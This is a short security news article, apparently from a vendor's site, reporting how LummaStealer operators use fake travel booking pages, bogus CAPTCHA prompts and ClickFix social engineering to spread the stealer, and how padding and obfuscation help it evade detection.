HQ/EMEAFind out how we can help your business
The LummaStealer operators have started exploiting fake booking websites to expand their attack scope.
According to reports, the most recent malware attack that used the information stealer targeted victims worldwide. The attack used bogus booking itinerary pages and false CAPTCHA verifications to execute malware payloads.
LummaStealer is a Malware-as-a-Service that first appeared in 2022 and has generally spread via networks like GitHub and Telegram. However, the researchers noted that the most recent data show that attackers are trying to infect unwitting and careless tourists.
The LummaStealer malware has transitioned from GitHub and Telegram vectors to booking portals.
Investigations uncovered that the LummaStealer operators take a different approach by utilising booking portals. This technique is new, as the malware was previously mainly distributed via channels like GitHub and Telegram.
The campaign’s infection chain was discovered in early 2025, focusing on consumers planning trips to Palawan, Philippines. Within a week, the attack vector had changed to a hotel in Munich, Germany, indicating a more widespread global focus on travel-related platforms.
Victims are deceived into the attack using phoney booking confirmation websites hosted on malicious domains. These fraudulent booking pages include a CAPTCHA prompt, but unlike a conventional verification step, this activity fools users into running a hidden malware payload.
Furthermore, the attackers also employ the social engineering technique, ClickFix, to convince users to manually run a PowerShell script that downloads and launches LummaStealer on their computer.
LummaStealer’s file size increased from 2MB to 9MB after deployment compared to previous versions. Researchers believe this indicates the inclusion of novel avoidance strategies, such as Binary Padding and Indirect Control Flow Obfuscation.
The researchers also noted that larger files cause longer response times for signature-based antivirus detections. It achieves this through using Dispatcher Blocks, which dynamically govern execution.
Still, experts advise the public that LummaStealer is fast growing and may eventually mirror well-known malware families such as Emotet, which uses several attack paths and sophisticated obfuscation.
With its increased payload complexity and novel distribution techniques, the malware will continue to pose a significant cybersecurity danger in the coming months.
